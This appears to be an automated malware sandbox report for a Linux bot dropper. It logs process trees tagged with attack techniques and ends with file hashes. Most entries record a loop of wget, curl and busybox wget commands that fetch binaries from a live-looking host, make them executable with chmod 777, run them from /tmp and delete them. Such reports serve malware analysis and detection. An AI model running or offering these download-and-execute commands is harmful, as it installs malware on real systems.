- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵PID:947
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:949
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:954
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:975
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:982
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1003
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1013
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
555B
MD5c3da85a3173a4ec9d42682016f6a69e2
SHA1b644cacfbf06e841788ab8deb5e388ef7ddf982d
SHA25677df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb
SHA512ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb